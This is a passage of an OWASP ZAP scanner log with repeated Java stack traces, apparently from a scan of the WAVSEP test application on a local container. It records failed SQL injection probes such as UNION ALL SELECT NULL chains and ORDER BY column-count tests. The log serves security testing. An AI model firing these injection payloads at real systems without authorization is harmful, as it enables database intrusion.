org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922552 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922554 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922556 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922557 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922558 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 6285-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 6285-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922560 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922561 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922563 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922564 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922565 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922566 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922567 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922570 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 